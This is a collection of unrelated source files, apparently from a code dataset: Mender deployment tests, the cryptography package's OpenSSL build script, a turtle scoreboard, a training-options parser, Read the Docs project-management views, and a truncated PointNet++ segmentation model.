create_dynamic_deployment(
"foo2", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
depbar = create_dynamic_deployment(
"bar", [predicate("foo", "inventory", "$eq", "bar")], user.utoken
)
# the device will ignore the 'foo' deployments, because of its inventory
dev = make_device_with_inventory(
[{"name": "foo", "value": "bar"}], user.utoken, setup_tenant.tenant_token
)
assert_get_next(200, dev.token, "bar")
# when running against staging, wait 5 seconds to avoid hitting
# the rate limits for the devices (one inventory update / 5 seconds)
isK8S() and time.sleep(5.0)
# after finishing 'bar' - no other deployments qualify
set_status(depbar["id"], "success", dev.token)
assert_get_next(204, dev.token)
# when running against staging, wait 5 seconds to avoid hitting
# the rate limits for the devices (one inventory update / 5 seconds)
isK8S() and time.sleep(5.0)
# after updating inventory, the device would qualify for both 'foo' deployments, but
# the ordering mechanism will prevent it
submit_inventory([{"name": "foo", "value": "foo"}], dev.token)
assert_get_next(204, dev.token)
# when running against staging, wait 5 seconds to avoid hitting
# the rate limits for the devices (one inventory update / 5 seconds)
isK8S() and time.sleep(5.0)
# it will however get a brand new 'foo3' deployment, because it's fresher than the finished 'bar'
create_dynamic_deployment(
"foo3", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
create_dynamic_deployment(
"foo4", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
assert_get_next(200, dev.token, "foo3")
@pytest.mark.parametrize(
"tc",
[
# without max_devices
{
"name": "without max_devices",
"phases": [{"batch_size": 20}, {"start_ts": None}],
"max_devices": None,
},
# with max_devices
{
"name": "with max_devices",
"phases": [{"batch_size": 20}, {"start_ts": None}],
"max_devices": 10,
},
],
)
def test_phased_rollout(self, clean_mongo_client, tc):
""" Check phased rollouts with and without max_devices.
"""
uuidv4 = str(uuid.uuid4())
tenant = create_tenant(
"test.mender.io-" + uuidv4,
"some.user+" + uuidv4 + "@example.com",
"enterprise",
)
user = tenant.users[0]
# adjust phase start ts for previous test case duration
# format for api consumption
for phase in tc["phases"]:
if "start_ts" in phase:
phase["start_ts"] = datetime.utcnow() + timedelta(
seconds=15 * WAITING_MULTIPLIER
)
phase["start_ts"] = phase["start_ts"].strftime("%Y-%m-%dT%H:%M:%SZ")
        # a phased dynamic deployment must have an initial matching-devices count,
        # so creation fails when no devices match the filter
create_dynamic_deployment(
"foo",
[predicate("foo", "inventory", "$eq", "foo")],
user.utoken,
phases=tc["phases"],
max_devices=tc["max_devices"],
status_code=400,
)
# a deployment with initial devs succeeds
devs = [
make_device_with_inventory(
[{"name": "bar", "value": "bar"}], user.utoken, tenant.tenant_token,
)
for i in range(10)
]
# adjust phase start ts for previous test case duration
# format for api consumption
for phase in tc["phases"]:
if "start_ts" in phase:
phase["start_ts"] = datetime.utcnow() + timedelta(
seconds=15 * WAITING_MULTIPLIER
)
phase["start_ts"] = phase["start_ts"].strftime("%Y-%m-%dT%H:%M:%SZ")
dep = create_dynamic_deployment(
"bar",
[predicate("bar", "inventory", "$eq", "bar")],
user.utoken,
phases=tc["phases"],
max_devices=tc["max_devices"],
)
assert dep["initial_device_count"] == 10
assert len(dep["phases"]) == len(tc["phases"])
# first phase is immediately on
for d in devs[:2]:
assert_get_next(200, d.token, "bar")
set_status(dep["id"], "success", d.token)
for d in devs[2:]:
assert_get_next(204, d.token)
# rough wait for phase 2
time.sleep(15 * WAITING_MULTIPLIER + 1)
for d in devs[2:]:
assert_get_next(200, d.token, "bar")
set_status(dep["id"], "success", d.token)
dep = get_deployment(dep["id"], user.utoken)
if tc["max_devices"] is None:
# no max_devices = deployment remains in progress
assert dep["status"] == "inprogress"
extra_devs = [
make_device_with_inventory(
[{"name": "bar", "value": "bar"}], user.utoken, tenant.tenant_token,
)
for i in range(10)
]
for extra in extra_devs:
assert_get_next(200, extra.token, "bar")
else:
# max_devices reached, so deployment is finished
assert dep["status"] == "finished"
|
the-stack_106_23277 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import os
import sys
from distutils import dist
from distutils.ccompiler import get_default_compiler
from distutils.command.config import config
from _cffi_src.utils import (
build_ffi_for_binding,
compiler_type,
extra_link_args,
)
def _get_openssl_libraries(platform):
if os.environ.get("CRYPTOGRAPHY_SUPPRESS_LINK_FLAGS", None):
return []
# OpenSSL goes by a different library name on different operating systems.
if platform == "win32" and compiler_type() == "msvc":
return [
"libssl",
"libcrypto",
"advapi32",
"crypt32",
"gdi32",
"user32",
"ws2_32",
]
else:
# darwin, linux, mingw all use this path
# In some circumstances, the order in which these libs are
# specified on the linker command-line is significant;
# libssl must come before libcrypto
# (https://marc.info/?l=openssl-users&m=135361825921871)
        # -lpthread is required due to the usage of pthread and the potential
        # existence of a static part containing e.g. pthread_atfork
# (https://github.com/pyca/cryptography/issues/5084)
if sys.platform == "zos":
return ["ssl", "crypto"]
else:
return ["ssl", "crypto", "pthread"]
def _extra_compile_args(platform):
"""
We set -Wconversion args here so that we only do Wconversion checks on the
code we're compiling and not on cffi itself (as passing -Wconversion in
    CFLAGS would do). We set no error on sign conversion because some
    function signatures in LibreSSL differ from OpenSSL and have changed from
    long to unsigned long in the past. Since that isn't a precision issue we
    don't care.
"""
# make sure the compiler used supports the flags to be added
is_gcc = False
if get_default_compiler() == "unix":
d = dist.Distribution()
cmd = config(d)
cmd._check_compiler()
is_gcc = (
"gcc" in cmd.compiler.compiler[0]
or "clang" in cmd.compiler.compiler[0]
)
if is_gcc or not (
platform in ["win32", "hp-ux11", "sunos5"]
or platform.startswith("aix")
):
return ["-Wconversion", "-Wno-error=sign-conversion"]
else:
return []
ffi = build_ffi_for_binding(
module_name="_openssl",
module_prefix="_cffi_src.openssl.",
modules=[
# This goes first so we can define some cryptography-wide symbols.
"cryptography",
# Provider comes early as well so we define OSSL_LIB_CTX
"provider",
"aes",
"asn1",
"bignum",
"bio",
"cmac",
"conf",
"crypto",
"dh",
"dsa",
"ec",
"ecdh",
"ecdsa",
"engine",
"err",
"evp",
"fips",
"hmac",
"nid",
"objects",
"ocsp",
"opensslv",
"osrandom_engine",
"pem",
"pkcs12",
"rand",
"rsa",
"ssl",
"x509",
"x509name",
"x509v3",
"x509_vfy",
"pkcs7",
"callbacks",
],
libraries=_get_openssl_libraries(sys.platform),
extra_compile_args=_extra_compile_args(sys.platform),
extra_link_args=extra_link_args(compiler_type()),
)
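# Editor's illustrative sketch (not part of the upstream build script): running
# this module directly would print the linker inputs and extra compiler flags
# that the helpers above select for the current platform.
if __name__ == "__main__":
    print("OpenSSL libraries:", _get_openssl_libraries(sys.platform))
    print("Extra compile args:", _extra_compile_args(sys.platform))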
|
the-stack_106_23278 | # class to handle the scoreboard
from turtle import Turtle
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.high_score = 0
self.get_high_score()
self.color("white")
self.penup()
self.update_score()
self.hideturtle()
# get and store highest score
def get_high_score(self):
with open("high_score.txt", mode="r") as file_score:
self.high_score = int(file_score.read())
def set_high_score(self):
with open("high_score.txt", mode="w") as file_score:
file_score.write(f"{self.score}")
# increment score
def incr_score(self):
self.score += 1
self.update_score()
def update_score(self):
self.clear()
self.goto(0, 270)
self.write(f"Score: {self.score} High Score: {self.high_score}", align="center", font=("Arial", 18, "normal"))
# reset score when game over
def reset(self):
if self.score > self.high_score:
self.set_high_score()
self.high_score = self.score
self.score = 0
self.update_score()
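# Editor's usage sketch (illustrative): assumes a turtle Screen is created by
# the surrounding game loop and that a "high_score.txt" file exists next to
# this script, since __init__ reads it.
if __name__ == "__main__":
    scoreboard = Scoreboard()
    scoreboard.incr_score()  # bump the score and redraw the banner
    scoreboard.reset()       # on game over: persist a new high score if beaten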
|
the-stack_106_23279 | from .base_options import BaseOptionsTest
class TestOptions(BaseOptionsTest):
def initialize(self, parser):
parser = BaseOptionsTest.initialize(self, parser)
parser.add_argument('--ntest', type=int, default=float("inf"), help='# of test examples.')
parser.add_argument('--results_dir', type=str, default='./results/', help='saves results here.')
parser.add_argument('--aspect_ratio', type=float, default=1.0, help='aspect ratio of result images')
parser.add_argument('--phase', type=str, default='test', help='train, val, test, etc')
        # Dropout and BatchNorm have different behavior during training and test.
parser.add_argument('--eval', action='store_true', help='use eval mode during test time.')
parser.add_argument('--num_test', type=int, default=1, help='how many test images to run')
parser.add_argument('--vis', dest='vis',
help='visualization mode',
action='store_true')
parser.set_defaults(model='cycle_gan')
# To avoid cropping, the loadSize should be the same as fineSize
parser.set_defaults(loadSize=parser.get_default('fineSize'))
self.isTrain = False
return parser
|
the-stack_106_23280 | """Project views for authenticated users."""
import logging
from allauth.socialaccount.models import SocialAccount
from celery import chain
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import (
Http404,
HttpResponseBadRequest,
HttpResponseNotAllowed,
HttpResponseRedirect,
)
from django.middleware.csrf import get_token
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.views.generic import ListView, TemplateView, View
from formtools.wizard.views import SessionWizardView
from vanilla import CreateView, DeleteView, DetailView, GenericView, UpdateView
from readthedocs.builds.forms import VersionForm
from readthedocs.builds.models import Version
from readthedocs.core.mixins import ListViewWithForm, LoginRequiredMixin
from readthedocs.core.utils import broadcast, prepare_build, trigger_build
from readthedocs.integrations.models import HttpExchange, Integration
from readthedocs.oauth.services import registry
from readthedocs.oauth.tasks import attach_webhook
from readthedocs.oauth.utils import update_webhook
from readthedocs.projects import tasks
from readthedocs.projects.forms import (
DomainForm,
EmailHookForm,
EnvironmentVariableForm,
IntegrationForm,
ProjectAdvancedForm,
ProjectAdvertisingForm,
ProjectBasicsForm,
ProjectExtraForm,
ProjectRelationshipForm,
RedirectForm,
TranslationForm,
UpdateProjectForm,
UserForm,
WebHookForm,
build_versions_form,
)
from readthedocs.projects.models import (
Domain,
EmailHook,
EnvironmentVariable,
Project,
ProjectRelationship,
WebHook,
)
from readthedocs.projects.notifications import EmailConfirmNotification
from readthedocs.projects.signals import project_import
from readthedocs.projects.views.base import ProjectAdminMixin, ProjectSpamMixin
from ..tasks import retry_domain_verification
log = logging.getLogger(__name__)
class PrivateViewMixin(LoginRequiredMixin):
pass
class ProjectDashboard(PrivateViewMixin, ListView):
"""Project dashboard."""
model = Project
template_name = 'projects/project_dashboard.html'
def validate_primary_email(self, user):
"""
        Sends a persistent error notification.
        Checks whether the user has a primary email address and whether it
        is verified, and sends a persistent error notification if either
        condition is False.
"""
email_qs = user.emailaddress_set.filter(primary=True)
email = email_qs.first()
if not email or not email.verified:
notification = EmailConfirmNotification(user=user, success=False)
notification.send()
def get_queryset(self):
return Project.objects.dashboard(self.request.user)
def get(self, request, *args, **kwargs):
self.validate_primary_email(request.user)
return super(ProjectDashboard, self).get(self, request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
@login_required
def project_manage(__, project_slug):
"""
Project management view.
Where you will have links to edit the projects' configuration, edit the
files associated with that project, etc.
Now redirects to the normal /projects/<slug> view.
"""
return HttpResponseRedirect(reverse('projects_detail', args=[project_slug]))
class ProjectUpdate(ProjectSpamMixin, PrivateViewMixin, UpdateView):
form_class = UpdateProjectForm
model = Project
success_message = _('Project settings updated')
template_name = 'projects/project_edit.html'
lookup_url_kwarg = 'project_slug'
lookup_field = 'slug'
def get_queryset(self):
return self.model.objects.for_admin_user(self.request.user)
def get_success_url(self):
return reverse('projects_detail', args=[self.object.slug])
class ProjectAdvancedUpdate(ProjectSpamMixin, PrivateViewMixin, UpdateView):
form_class = ProjectAdvancedForm
model = Project
success_message = _('Project settings updated')
template_name = 'projects/project_advanced.html'
lookup_url_kwarg = 'project_slug'
lookup_field = 'slug'
def get_queryset(self):
return self.model.objects.for_admin_user(self.request.user)
def get_success_url(self):
return reverse('projects_detail', args=[self.object.slug])
@login_required
def project_versions(request, project_slug):
"""
Project versions view.
    Shows the available versions and lets the user choose which ones they
    would like to have built.
"""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
if not project.is_imported:
raise Http404
form_class = build_versions_form(project)
form = form_class(data=request.POST or None)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('Project versions updated'))
project_dashboard = reverse('projects_detail', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
return render(
request,
'projects/project_versions.html',
{'form': form, 'project': project},
)
@login_required
def project_version_detail(request, project_slug, version_slug):
"""Project version detail page."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
version = get_object_or_404(
Version.objects.public(
user=request.user,
project=project,
only_active=False,
),
slug=version_slug,
)
form = VersionForm(request.POST or None, instance=version)
if request.method == 'POST' and form.is_valid():
version = form.save()
if form.has_changed():
if 'active' in form.changed_data and version.active is False:
log.info('Removing files for version %s', version.slug)
broadcast(
type='app',
task=tasks.remove_dirs,
args=[version.get_artifact_paths()],
)
version.built = False
version.save()
url = reverse('project_version_list', args=[project.slug])
return HttpResponseRedirect(url)
return render(
request,
'projects/project_version_detail.html',
{'form': form, 'project': project, 'version': version},
)
@login_required
def project_delete(request, project_slug):
"""
Project delete confirmation view.
    Mark a project as deleted on POST, otherwise show a form asking for
confirmation of delete.
"""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
if request.method == 'POST':
broadcast(
type='app',
task=tasks.remove_dirs,
args=[(project.doc_path,)],
)
project.delete()
messages.success(request, _('Project deleted'))
project_dashboard = reverse('projects_dashboard')
return HttpResponseRedirect(project_dashboard)
return render(request, 'projects/project_delete.html', {'project': project})
class ImportWizardView(ProjectSpamMixin, PrivateViewMixin, SessionWizardView):
"""Project import wizard."""
form_list = [
('basics', ProjectBasicsForm),
('extra', ProjectExtraForm),
]
condition_dict = {'extra': lambda self: self.is_advanced()}
def get_form_kwargs(self, step=None):
"""Get args to pass into form instantiation."""
kwargs = {}
kwargs['user'] = self.request.user
if step == 'basics':
kwargs['show_advanced'] = True
return kwargs
def get_template_names(self):
"""Return template names based on step name."""
return 'projects/import_{}.html'.format(self.steps.current)
def done(self, form_list, **kwargs):
"""
Save form data as object instance.
Don't save form data directly, instead bypass documentation building and
other side effects for now, by signalling a save without commit. Then,
        finish by adding the members to the project and saving.
"""
form_data = self.get_all_cleaned_data()
extra_fields = ProjectExtraForm.Meta.fields
# expect the first form; manually wrap in a list in case it's a
# View Object, as it is in Python 3.
basics_form = list(form_list)[0]
# Save the basics form to create the project instance, then alter
# attributes directly from other forms
project = basics_form.save()
tags = form_data.pop('tags', [])
for tag in tags:
project.tags.add(tag)
for field, value in list(form_data.items()):
if field in extra_fields:
setattr(project, field, value)
project.save()
# TODO: this signal could be removed, or used for sync task
project_import.send(sender=project, request=self.request)
self.trigger_initial_build(project)
return HttpResponseRedirect(
reverse('projects_detail', args=[project.slug]),
)
def trigger_initial_build(self, project):
"""Trigger initial build."""
update_docs, build = prepare_build(project)
if (update_docs, build) == (None, None):
return None
task_promise = chain(
attach_webhook.si(project.pk, self.request.user.pk),
update_docs,
)
async_result = task_promise.apply_async()
return async_result
def is_advanced(self):
"""Determine if the user selected the `show advanced` field."""
data = self.get_cleaned_data_for_step('basics') or {}
return data.get('advanced', True)
class ImportDemoView(PrivateViewMixin, View):
"""View to pass request on to import form to import demo project."""
form_class = ProjectBasicsForm
request = None
args = None
kwargs = None
def get(self, request, *args, **kwargs):
"""Process link request as a form post to the project import form."""
self.request = request
self.args = args
self.kwargs = kwargs
data = self.get_form_data()
project = Project.objects.for_admin_user(
request.user,
).filter(repo=data['repo']).first()
if project is not None:
messages.success(
request,
_('The demo project is already imported!'),
)
else:
kwargs = self.get_form_kwargs()
form = self.form_class(data=data, **kwargs)
if form.is_valid():
project = form.save()
project.save()
self.trigger_initial_build(project)
messages.success(
request,
_('Your demo project is currently being imported'),
)
else:
messages.error(
request,
_('There was a problem adding the demo project'),
)
return HttpResponseRedirect(reverse('projects_dashboard'))
return HttpResponseRedirect(
reverse('projects_detail', args=[project.slug]),
)
def get_form_data(self):
"""Get form data to post to import form."""
return {
'name': '{}-demo'.format(self.request.user.username),
'repo_type': 'git',
'repo': 'https://github.com/readthedocs/template.git',
}
def get_form_kwargs(self):
"""Form kwargs passed in during instantiation."""
return {'user': self.request.user}
def trigger_initial_build(self, project):
"""
Trigger initial build.
Allow to override the behavior from outside.
"""
return trigger_build(project)
class ImportView(PrivateViewMixin, TemplateView):
"""
    On GET, show the source import view; on POST, mock out a wizard.
If we are accepting POST data, use the fields to seed the initial data in
:py:class:`ImportWizardView`. The import templates will redirect the form to
`/dashboard/import`
"""
template_name = 'projects/project_import.html'
wizard_class = ImportWizardView
def get(self, request, *args, **kwargs):
"""
Display list of repositories to import.
Adds a warning to the listing if any of the accounts connected for the
user are not supported accounts.
"""
deprecated_accounts = (
SocialAccount.objects
.filter(user=self.request.user)
.exclude(
provider__in=[
service.adapter.provider_id for service in registry
],
)
) # yapf: disable
for account in deprecated_accounts:
provider_account = account.get_provider_account()
messages.error(
request,
mark_safe((
_(
'There is a problem with your {service} account, '
'try reconnecting your account on your '
'<a href="{url}">connected services page</a>.',
).format(
service=provider_account.get_brand()['name'],
url=reverse('socialaccount_connections'),
)
)), # yapf: disable
)
return super().get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
initial_data = {}
initial_data['basics'] = {}
for key in ['name', 'repo', 'repo_type', 'remote_repository']:
initial_data['basics'][key] = request.POST.get(key)
initial_data['extra'] = {}
for key in ['description', 'project_url']:
initial_data['extra'][key] = request.POST.get(key)
request.method = 'GET'
return self.wizard_class.as_view(initial_dict=initial_data)(request)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['view_csrf_token'] = get_token(self.request)
context['has_connected_accounts'] = SocialAccount.objects.filter(
user=self.request.user,
).exists()
return context
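# Editor's note (illustrative): the wizard above is seeded with a nested
# initial_dict keyed by step name, for example:
#     {
#         'basics': {'name': ..., 'repo': ..., 'repo_type': ..., 'remote_repository': ...},
#         'extra': {'description': ..., 'project_url': ...},
#     }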
class ProjectRelationshipMixin(ProjectAdminMixin, PrivateViewMixin):
model = ProjectRelationship
form_class = ProjectRelationshipForm
lookup_field = 'child__slug'
lookup_url_kwarg = 'subproject_slug'
def get_queryset(self):
self.project = self.get_project()
return self.model.objects.filter(parent=self.project)
def get_form(self, data=None, files=None, **kwargs):
kwargs['user'] = self.request.user
return super().get_form(data, files, **kwargs)
def form_valid(self, form):
broadcast(
type='app',
task=tasks.symlink_subproject,
args=[self.get_project().pk],
)
return super().form_valid(form)
def get_success_url(self):
return reverse('projects_subprojects', args=[self.get_project().slug])
class ProjectRelationshipList(ProjectRelationshipMixin, ListView):
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['superproject'] = self.project.superprojects.first()
return ctx
class ProjectRelationshipCreate(ProjectRelationshipMixin, CreateView):
pass
class ProjectRelationshipUpdate(ProjectRelationshipMixin, UpdateView):
pass
class ProjectRelationshipDelete(ProjectRelationshipMixin, DeleteView):
def get(self, request, *args, **kwargs):
return self.http_method_not_allowed(request, *args, **kwargs)
@login_required
def project_users(request, project_slug):
"""Project users view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
form = UserForm(data=request.POST or None, project=project)
if request.method == 'POST' and form.is_valid():
form.save()
project_dashboard = reverse('projects_users', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
users = project.users.all()
return render(
request,
'projects/project_users.html',
{'form': form, 'project': project, 'users': users},
)
@login_required
def project_users_delete(request, project_slug):
if request.method != 'POST':
return HttpResponseNotAllowed('Only POST is allowed')
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
user = get_object_or_404(
User.objects.all(),
username=request.POST.get('username'),
)
if user == request.user:
raise Http404
project.users.remove(user)
project_dashboard = reverse('projects_users', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
@login_required
def project_notifications(request, project_slug):
"""Project notification view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
email_form = EmailHookForm(data=None, project=project)
webhook_form = WebHookForm(data=None, project=project)
if request.method == 'POST':
if 'email' in request.POST.keys():
email_form = EmailHookForm(data=request.POST, project=project)
if email_form.is_valid():
email_form.save()
elif 'url' in request.POST.keys():
webhook_form = WebHookForm(data=request.POST, project=project)
if webhook_form.is_valid():
webhook_form.save()
emails = project.emailhook_notifications.all()
urls = project.webhook_notifications.all()
return render(
request,
'projects/project_notifications.html',
{
'email_form': email_form,
'webhook_form': webhook_form,
'project': project,
'emails': emails,
'urls': urls,
},
)
@login_required
def project_notifications_delete(request, project_slug):
"""Project notifications delete confirmation view."""
if request.method != 'POST':
return HttpResponseNotAllowed('Only POST is allowed')
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
try:
project.emailhook_notifications.get(
email=request.POST.get('email'),
).delete()
except EmailHook.DoesNotExist:
try:
project.webhook_notifications.get(
url=request.POST.get('email'),
).delete()
except WebHook.DoesNotExist:
raise Http404
project_dashboard = reverse('projects_notifications', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
@login_required
def project_translations(request, project_slug):
"""Project translations view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
form = TranslationForm(
data=request.POST or None,
parent=project,
user=request.user,
)
if request.method == 'POST' and form.is_valid():
form.save()
project_dashboard = reverse(
'projects_translations',
args=[project.slug],
)
return HttpResponseRedirect(project_dashboard)
lang_projects = project.translations.all()
return render(
request,
'projects/project_translations.html',
{
'form': form,
'project': project,
'lang_projects': lang_projects,
},
)
@login_required
def project_translations_delete(request, project_slug, child_slug):
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
subproj = get_object_or_404(
project.translations,
slug=child_slug,
)
project.translations.remove(subproj)
project_dashboard = reverse('projects_translations', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
@login_required
def project_redirects(request, project_slug):
"""Project redirects view and form view."""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
form = RedirectForm(data=request.POST or None, project=project)
if request.method == 'POST' and form.is_valid():
form.save()
project_dashboard = reverse('projects_redirects', args=[project.slug])
return HttpResponseRedirect(project_dashboard)
redirects = project.redirects.all()
return render(
request,
'projects/project_redirects.html',
{'form': form, 'project': project, 'redirects': redirects},
)
@login_required
def project_redirects_delete(request, project_slug):
"""Project redirect delete view."""
if request.method != 'POST':
return HttpResponseNotAllowed('Only POST is allowed')
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
redirect = get_object_or_404(
project.redirects,
pk=request.POST.get('id_pk'),
)
if redirect.project == project:
redirect.delete()
else:
raise Http404
return HttpResponseRedirect(
reverse('projects_redirects', args=[project.slug]),
)
@login_required
def project_version_delete_html(request, project_slug, version_slug):
"""
Project version 'delete' HTML.
This marks a version as not built
"""
project = get_object_or_404(
Project.objects.for_admin_user(request.user),
slug=project_slug,
)
version = get_object_or_404(
Version.objects.public(
user=request.user,
project=project,
only_active=False,
),
slug=version_slug,
)
if not version.active:
version.built = False
version.save()
broadcast(
type='app',
task=tasks.remove_dirs,
args=[version.get_artifact_paths()],
)
else:
return HttpResponseBadRequest(
"Can't delete HTML for an active version.",
)
return HttpResponseRedirect(
reverse('project_version_list', kwargs={'project_slug': project_slug}),
)
class DomainMixin(ProjectAdminMixin, PrivateViewMixin):
model = Domain
form_class = DomainForm
lookup_url_kwarg = 'domain_pk'
def get_success_url(self):
return reverse('projects_domains', args=[self.get_project().slug])
class DomainList(DomainMixin, ListViewWithForm):
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
# Retry validation on all domains if applicable
for domain in ctx['domain_list']:
retry_domain_verification.delay(domain_pk=domain.pk)
return ctx
class DomainCreate(DomainMixin, CreateView):
pass
class DomainUpdate(DomainMixin, UpdateView):
pass
class DomainDelete(DomainMixin, DeleteView):
pass
class IntegrationMixin(ProjectAdminMixin, PrivateViewMixin):
"""Project external service mixin for listing webhook objects."""
model = Integration
integration_url_field = 'integration_pk'
form_class = IntegrationForm
def get_queryset(self):
return self.get_integration_queryset()
def get_object(self):
return self.get_integration()
def get_integration_queryset(self):
self.project = self.get_project()
return self.model.objects.filter(project=self.project)
def get_integration(self):
"""Return project integration determined by url kwarg."""
if self.integration_url_field not in self.kwargs:
return None
return get_object_or_404(
Integration,
pk=self.kwargs[self.integration_url_field],
project=self.get_project(),
)
def get_success_url(self):
return reverse('projects_integrations', args=[self.get_project().slug])
def get_template_names(self):
if self.template_name:
return self.template_name
return 'projects/integration{}.html'.format(self.template_name_suffix)
class IntegrationList(IntegrationMixin, ListView):
pass
class IntegrationCreate(IntegrationMixin, CreateView):
def get_success_url(self):
return reverse(
'projects_integrations_detail',
kwargs={
'project_slug': self.get_project().slug,
'integration_pk': self.object.id,
},
)
class IntegrationDetail(IntegrationMixin, DetailView):
# Some of the templates can be combined, we'll avoid duplicating templates
SUFFIX_MAP = {
Integration.GITHUB_WEBHOOK: 'webhook',
Integration.GITLAB_WEBHOOK: 'webhook',
Integration.BITBUCKET_WEBHOOK: 'webhook',
Integration.API_WEBHOOK: 'generic_webhook',
}
def get_template_names(self):
if self.template_name:
return self.template_name
integration_type = self.get_integration().integration_type
suffix = self.SUFFIX_MAP.get(integration_type, integration_type)
return (
'projects/integration_{}{}.html'
.format(suffix, self.template_name_suffix)
)
class IntegrationDelete(IntegrationMixin, DeleteView):
def get(self, request, *args, **kwargs):
return self.http_method_not_allowed(request, *args, **kwargs)
class IntegrationExchangeDetail(IntegrationMixin, DetailView):
model = HttpExchange
lookup_url_kwarg = 'exchange_pk'
template_name = 'projects/integration_exchange_detail.html'
def get_queryset(self):
return self.model.objects.filter(integrations=self.get_integration())
def get_object(self):
return DetailView.get_object(self)
class IntegrationWebhookSync(IntegrationMixin, GenericView):
"""
Resync a project webhook.
The signal will add a success/failure message on the request.
"""
def post(self, request, *args, **kwargs):
# pylint: disable=unused-argument
if 'integration_pk' in kwargs:
integration = self.get_integration()
update_webhook(self.get_project(), integration, request=request)
else:
            # This is a brute force form of the webhook sync. If a project has a
# webhook or a remote repository object, the user should be using
# the per-integration sync instead.
attach_webhook(
project_pk=self.get_project().pk,
user_pk=request.user.pk,
)
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
return reverse('projects_integrations', args=[self.get_project().slug])
class ProjectAdvertisingUpdate(PrivateViewMixin, UpdateView):
model = Project
form_class = ProjectAdvertisingForm
success_message = _('Project has been opted out from advertisement support')
template_name = 'projects/project_advertising.html'
lookup_url_kwarg = 'project_slug'
lookup_field = 'slug'
def get_queryset(self):
return self.model.objects.for_admin_user(self.request.user)
def get_success_url(self):
return reverse('projects_advertising', args=[self.object.slug])
class EnvironmentVariableMixin(ProjectAdminMixin, PrivateViewMixin):
"""Environment Variables to be added when building the Project."""
model = EnvironmentVariable
form_class = EnvironmentVariableForm
lookup_url_kwarg = 'environmentvariable_pk'
def get_success_url(self):
return reverse(
'projects_environmentvariables',
args=[self.get_project().slug],
)
class EnvironmentVariableList(EnvironmentVariableMixin, ListView):
pass
class EnvironmentVariableCreate(EnvironmentVariableMixin, CreateView):
pass
class EnvironmentVariableDetail(EnvironmentVariableMixin, DetailView):
pass
class EnvironmentVariableDelete(EnvironmentVariableMixin, DeleteView):
# This removes the delete confirmation
def get(self, request, *args, **kwargs):
return self.http_method_not_allowed(request, *args, **kwargs)
|
the-stack_106_23285 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
"""
Contains PointNet++ SSG/MSG semantic segmentation models
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import paddle.fluid as fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Constant
from .pointnet2_modules import *
__all__ = ["PointNet2SemSegSSG", "PointNet2SemSegMSG"]
class PointNet2SemSeg(object):
def __init__(self, num_classes, num_points, use_xyz=True):
self.num_classes = num_classes
self.num_points = num_points
self.use_xyz = use_xyz
self.feed_vars = []
self.out_feature = None
self.pyreader = None
self.model_config()
def model_config(self):
self.SA_confs = []
self.FP_confs = []
def build_input(self):
self.xyz = fluid.layers.data(name='xyz', shape=[self.num_points, 3], dtype='float32', lod_level=0)
self.feature = fluid.layers.data(name='feature', shape=[self.num_points, 6], dtype='float32', lod_level=0)
self.label = fluid.layers.data(name='label', shape=[self.num_points, 1], dtype='int64', lod_level=0)
self.pyreader = fluid.io.PyReader(
feed_list=[self.xyz, self.feature, self.label],
capacity=64,
use_double_buffer=True,
iterable=False)
self.feed_vars = [self.xyz, self.feature, self.label]
def build_model(self, bn_momentum=0.99):
self.build_input()
xyzs, features = [self.xyz], [self.feature]
xyzi, featurei = xyzs[-1], fluid.layers.transpose(self.feature, perm=[0, 2, 1])
for i, SA_conf in enumerate(self.SA_confs):
xyzi, featurei = pointnet_sa_module(
xyz=xyzi,
feature=featurei,
bn_momentum=bn_momentum,
use_xyz=self.use_xyz,
name="sa_{}".format(i),
**SA_conf)
xyzs.append(xyzi)
features.append(fluid.layers.transpose(featurei, perm=[0, 2, 1]))
for i in range(-1, -(len(self.FP_confs) + 1), -1):
features[i - 1] = pointnet_fp_module(
unknown=xyzs[i - 1],
known=xyzs[i],
unknown_feats=features[i - 1],
known_feats=features[i],
bn_momentum=bn_momentum,
